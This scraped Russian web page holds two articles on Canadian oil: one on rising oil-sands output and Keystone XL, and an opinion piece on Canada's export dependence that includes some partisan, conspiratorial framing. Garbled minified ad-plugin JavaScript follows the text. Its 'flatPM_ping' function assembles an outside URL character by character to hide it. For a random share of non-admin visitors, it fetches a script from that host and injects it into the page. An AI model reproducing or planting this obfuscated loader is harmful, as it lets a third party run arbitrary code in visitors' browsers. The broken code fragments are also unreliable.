Эксперты САРР особо подчеркивают, что ближайшие 18 месяцев добыча в Канаде будет стабильно расти, несмотря на сокращение инвестиций в нефтяную отрасль с конца 2014 года. Рост обеспечат проекты, которые начались до обвала нефтяного рынка и не были остановлены из-за низких цен на энергоносители. На прошлой неделе первые партии сырья, добытого в рамках этих проектов, поступили на рынок США.

Сверхтяжелая нефть, добываемая в рамках этих проектов, обеспечит рост добычи на 270 тыс. барр./сут. в 2017 году и на 320 тыс. барр./сут. – в 2018 году.  В следующем году совокупный объем производства сверхтяжелой нефти в Канаде достигнет 3 млн барр./сут.

Аналитик консалтингового агентства HIS Markit Кевин Берн уверен, что в ближайшие годы по темпам роста добычи нефти Канада уступит только США. Впервые в истории Канада станет влиятельным игроком на мировом рынке углеводородов благодаря сверхтяжелой нефти, добытой в провинции Альберта.

Однако, Берн считает, что из-за снижения инвестиций в последние годы темпы роста добычи в Канаде замедлятся уже в 2019 году, а после 2020 года не будут превышать 100 тыс. барр./сут.

Канада и США против ОПЕК+

Прирост добычи в Канаде в этом и следующем годах составляет примерно треть от объема, который должен быть сокращен в рамках соглашения ОПЕК+ (члены ОПЕК и страны к ним присоединившиеся). Участники нефтяного рынка Северной Америки уверены, что нефтяники Канады и США сведут на нет усилия ОПЕК+, направленные на ликвидацию избытка предложения углеводородного сырья на мировом рынке.

В Международном энергетическом агентстве и Управлении энергетической информации США (EIA) считают, что в этом году добыча в США достигнет рекордного 10 млн барр./сут.

благодаря увеличению производства на сланцевых структурах. По данным EIA, на прошлой неделе добыча в США составила 9,338 млн барр./сут.

Более того, МЭА ожидает, что в следующем году тенденция роста производства в американская нефтяной отрасли продолжится.

Western Canada Select – новый эталон

Канада является крупнейшим экспортером нефти в США. В 2016 году объем поставок достиг 3,256 млн барр./сут. – больше, чем их совокупный импорт из всех стран ОПЕК.

Основным канадским экспортным сортом является Western Canada Select, который представляет собой смесь сверхтяжелой нефти с конденсатом или легкой нефтью.

Из-за высокой вязкости сверхтяжелую нефть невозможно прокачать по трубопроводам и перерабатывать на НПЗ, поэтому 65% сырья, добываемого в Альберте, смешивают с легкими углеводородами.

Western Canada Select последние годы стал эталонным сортом для тяжелой нефти на рынке Северной Америки. Качество канадского эталона – плотность 20,5⁰ API (934 кг/куб.

м),  содержание серы 3,3% – значительно ниже, чем американского WTI или североморского Brent, поэтому он продается со большой скидкой на рынке США.

Когда нефтяные цены превышали 100 долларов за баррель, скидка на Western Canada Select по отношению к сортам, добываемым в Мексиканском заливе, достигала 55 долларов за баррель.

Основной причиной такой драконовской скидки является отсутствие инфраструктуры для транспортировки нефти из Альберты в район Мексиканского залива, где расположены основные нефтеперерабатывающие мощности США. Калифорнийский сорт Kern – более тяжелый, чем Western Canada Select – продается с минимальной скидкой к WTI, поскольку перерабатывается на месте – в штате Калифорния.

Помощь пришла откуда не ждали

Дональд Трамп, став президентом США, начал воплощать в жизнь свои предвыборные обещания, главное из которых – отмена ограничений для добычи и транспортировки нефти.

В марте этого года Трамп отменил решение предыдущего президента Барака Обамы, запрещающее строительство нефтепровода Keystone XL, который соединит Альберту сначала с Кушингом, где расположены основные коммерческие хранилища нефти в США, и побережьем Мексиканского залива.

Компания TransCanada обещала завершить строительство в кратчайшие сроки, хотя точная дата названа не была. Эксперты полагают, что проект может быть реализован в течение года при отсутствии противодействия со стороны защитников окружающей среды.

Keystone XL позволит повысить стоимость канадской нефти и увеличить экспорт в США, что станет стимулом для компаний, ведущих разработку месторождений битуминозных песков в Альберте. В свою очередь, американские нефтепереработчики обеспечат загрузку своих заводов, а США увеличат поставки за рубеж своей легкой нефти.

Источник: https://nangs.org/news/world/kanada-stanovitsya-neftyanoj-sverkhderzhavoj

О том, как канада сидит на нефтяной игле

Но в Монреале ситуация иная: бензин дешевеет не столь быстро, и далеко не все этому рады. Таковы проблемы «банановых» стран, чрезмерно ориентированных на экспорт. Причем неважно, что вы экспортируете: бананы, микросхемы, BMW или нефть.

Важно, насколько вы зависите от этого экспорта и насколько контролируете цены на свой товар.

К сожалению, не только Россия, но и Канада оказалась в числе пострадавших от обвала нефтяных цен.

Еще в прошлом году Стивен Харпер делал ставку на экспорт углеводородов и возмущался тем, что США «маринуют» проект трубопровода Keystone из Альберты до портов Мексиканского залива, угрожая переориентироваться на Китай.

Но сегодня добывающая отрасль стала источником колоссальных проблем и убытков. И одной из причин удешевления нефти стал как раз этот нефтепровод.

Кстати, любопытно информационное обрамление его строительства. Создается впечатление хорошо проведенной спецоперации, умело подаваемой дезинформации, большой игры! В демократической стране с развитой свободой слова суметь незаметно провести такую операцию – высокое искусство.

Стройку эту обсуждают во всем мире, её то останавливают, то переносят сроки и маршруты, вокруг нее кипят экологические страсти – и мало кто заметил даже в США, что труба давно работает. Уже с февраля 2011 г.

нефть пошла по первому самому длинному участку от Хардисти в Альберте до хабов (главных пунктов переработки и распределения, настоящих нефтяных сердец Америки) Патоки в Иллинойсе и Кашинга в Оклахоме. А в январе 2014 г. труба вышла к Мексиканскому заливу.

И лишь 4-й, спрямляющий участок Keystone XL, идущий через Монтану и Дакоту, пока не согласован Конгрессом и администрацией.

И такое вот совпадение: аккурат вскоре после завершения фазы 3а (выхода трубы к портам Техаса) начался обвал мировых цен на нефть. Подкосив рентабельность канадского же экспорта. И может сложиться парадоксальная ситуация, когда нефть из Канады пойдет в… Канаду!

Дело в том, что до сих пор власти США запрещали экспорт сырой нефти. Продукты переработки – пожалуйста.

Но не сырье! Однако ситуация меняется на глазах, американские НПЗ не справляются с переработкой, и канадская компания Enbridge Inc летом отправила в Европу первый танкер из Мексиканского залива – с реэкспортной канадской нефтью.

Сразу несколько компаний, в том числе и такие крупные, как Royal Dutch Shell, BP и Vitol, обратились к властям с просьбой разрешить экспорт её излишков. Для чего и надо искать покупателей за рубежом. Но самый близкий сосед – Канада!

С одной стороны, она крупнейший поставщик нефти в США. С другой, не имеет приличной сети широтных трубопроводов.

Поэтому пустынный запад Канады захлебывается нефтью, а промышленный восток, где сосредоточены главные потребители и НПЗ, вынужден её импортировать.

К тому же заводы Квебека не рассчитаны на переработку тяжелого битумена Альберты, и сырье для них везут либо танкеры из Северного моря и с шельфовых платформ Ньюфаундленда, либо качают по трубе из Портленда, США.

И вот вам парадоксы капиталистического хозяйствования: после выхода Keystone к портам Мексиканского залива выяснилось, что вывоз нефти танкерами обходится куда дешевле прокачки по суше. Экспорт нефти из Техаса на НПЗ в Нью-Брансуике обойдется всего в $1,5 за баррель против $ 4,55 за доставку по трубопроводу на заводы Филадельфии.

Из-за отсутствия развитой сети трубопроводов восток страны вынужден закупать импортную нефть, а запад продает её за рубеж. Но и с экспортом дела плохи.

97% его уходит в США, и в условиях сланцевого бума ввод в действие Keystone привел к падению цен! Надо отдать должное американцам, сумевшим за канадский счет устроить экономический рай с недорогой нефтью.

Попутно замечу, что бензин в Монреале так дорог не потому, что НПЗ Квебека нефть импортируют, – США также 40% нефти ввозят. Все дело в социальности канадского общественного уклада, а значит и в высоких ставках налогов.

Социализм и налоги — это синонимы! В США полная налоговая нагрузка на бензин, включая акциз и разновидности налога с продаж, колеблется в разных штатах от 35 до 70 центов за галлон. В Канаде она выше в 2-3 раза и особенно высока именно в Монреале (123 цента за галлон) и Ванкувере (155 центов).

Увы, Канада оказалась не готова к появлению большой нефти Альберты. Она организовала добычу из нефтеносных песков, что было непросто сделать ввиду технологических проблем и трудностей, связанных с работами на дальнем Севере. А вот о транспортировке нефти задумались с большим опозданием, и тут прямая вина правительства.

Его задача не только собирать и делить налоги, но и содействовать бизнесу, особенно стратегическому. Американцы предлагали помощь в постройке трансканадской трубы, но Оттава отказала, опасаясь установления их контроля над нефтяной инфраструктурой страны.

И получила взамен американский контроль над канадским экспортом!

Недавно компания «Энбридж» озвучила намерение реверсировать трубопровод между Сарнией и Монреалем, чтобы качать нефть с запада на восток.

Давно пора, ибо ситуация, когда страна вынуждена импортировать едва ли не половину потребляемой нефти при том, что 2/3 добываемой в ней уходит на экспорт, не делает ей чести и ведет к огромным убыткам.

Но куда затем везти излишки нефти? В планах «Энбридж» симметричный ответ американским экспортным замыслам, то есть экспорт канадской нефти морем на заводы Техаса. Однако заранее ясно, что это приведет к дальнейшему перенасыщению американского рынка – и к снижению цен!

Экспорт при этом станет совершенно невыгодным. Себестоимость добычи нефти из битумных песков весьма высока ($70-85), и при нынешних ценах её добыча нерентабельна. Канадская нефть сбила американские цены себе в ущерб! Результатом стало сокращение экспорта, этой главной движущей силы канадского ВВП. Премьер-министр Харпер в январе 2014 г.

провозглашал, что сильный сырьевой сектор Запада означает качественные рабочие места на производствах Востока Канады. Его кабинет доказывал, что развитие разработок нефтяных песков Альберты и увеличение экспорта сырья станет рычагом для экономики всей страны.

Министр естественных ресурсов Джо Оливер предполагал, что более чем 600 главных ресурсных проектов приведут в страну до $650 млрд. инвестиций в следующее десятилетие!

Однако цифры говорят об ином. Если за последние 5 лет нефтяные, газовые и горнодобывающие компании увеличили персонал на 4,4%, то численность занятых в обрабатывающей промышленности упала на 9,4%. Минусы, учитывая число занятых в этих отраслях, на порядок превышают плюсы!

Большая нефть или газ, как показала практика Голландии и России (в экономический обиход вошло даже понятие «голландская болезнь»), угнетающе действует на остальную экономику страны.

ВВП начинает негативно зависеть от цен на нефть (в импортирующих США их снижение ведет к росту деловой активности, в экспортирующей Канаде наоборот), а нефтяные доходы кроме того поддерживают завышенное значение канадского доллара, что ухудшает экспортные возможности.

Нынешнее удешевление нефти наглядно показало, какие риски для «банановых» стран несет ориентация на экспорт. 17 декабря нефтедобывающие компании Канады объявили о сокращении капитальных расходов, пишет The Wall Street Journal. Так, Husky Energy заявила, что сократит их на 33% в 2015 году.

Penn West сократила свой бюджет на следующий год примерно до $537 млн., хотя ещё в ноябре объявляла, что он составит около $720 млн. Об аналогичных планах объявили другие энергетические компании: Bonavista Energy, Whitecap Resources и MEG Energy.

Причем последняя сократила запланированные капиталовложения в 4 раза!

Американская Chevron отложила на неопределенный срок планы по бурению нефтяных скважин на арктическом шельфе Канады. А ведь бурение в Арктике требует больше инвестиций, чем многие другие способы разведки нефти. Например, Royal Dutch Shell потратила около 8 лет и $6 млрд.

на геологическую разведку у северного побережья Аляски и до сих пор не завершила бурения ни одной скважины.

«Решение Chevron – это ещё одно доказательство того, что рискованные, дорогие проекты в Северном Ледовитом океане становятся все менее привлекательными», – пишет Financial Times.

Пришлось пересмотреть инвестиционные планы и тем компаниям, что добывают сланцевую нефть. Так, американская ConocoPhillips в декабре объявила о сокращении капиталовложений на 20% и намерении отложить бурение на нескольких сланцевых месторождениях.

Увяла на корню и попытка экспорта тяжелой нефти в Европу. В конце сентября крупнейший нефтегазовый добытчик Suncor Energy Inc. сообщил о том, что первый афрамакс (танкер от 80 000 до 120 000 тонн дедвейта) «Минерва Глория» встал под погрузку в порту Sorel-Tracy на реке Св.

Лаврентия с тем, чтобы переправить груз в Средиземное море. Это попытка уменьшить зависимость от экспорта в США, где цены низки.

Так нефть Альберты стала напрямую конкурировать с российской и саудовской! Увы, о последующих рейсах информации не поступало, что неудивительно – в начале октября цена нефти упала ниже $80 за баррель и экспорт стал невыгоден.

Между прочим, из-за отсутствия трансканадского трубопровода Suncor была вынуждена ежедневно отправлять в Sorel-Tracy по 30 железнодорожных составов! И кроме этого ещё 137 тыс. баррелей в день на НПЗ Монреаля.

Понятно, что через год-другой уменьшение инвестиций и снижение рентабельности действующих месторождений, от чего уже страдают Россия, Канада, Венесуэла и Бразилия, приведут к уменьшению разведанных запасов углеводородов и самой добычи, так что цена нефти пойдет вверх, но эти годы надо пережить. И если в том, что Канада переболеет и выздоровеет, сомневаться не приходится (иное дело, сделает ли она из этого соответствующие выводы), то в отношении России такой уверенности нет. Там помимо нефти сплелись в один узел-удавку ещё несколько удушающих факторов.

Но в любом случае большая нефть рождает большие проблемы! Канада уже столкнулась с ними. И благоденствующие сейчас США, наращивая её добычу, также должны об этом помнить. » /Юрий Кирпичев

Источник: https://nstarikov.ru/o-tom-kak-kanada-sidit-na-neftyanoj-igle-48019

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};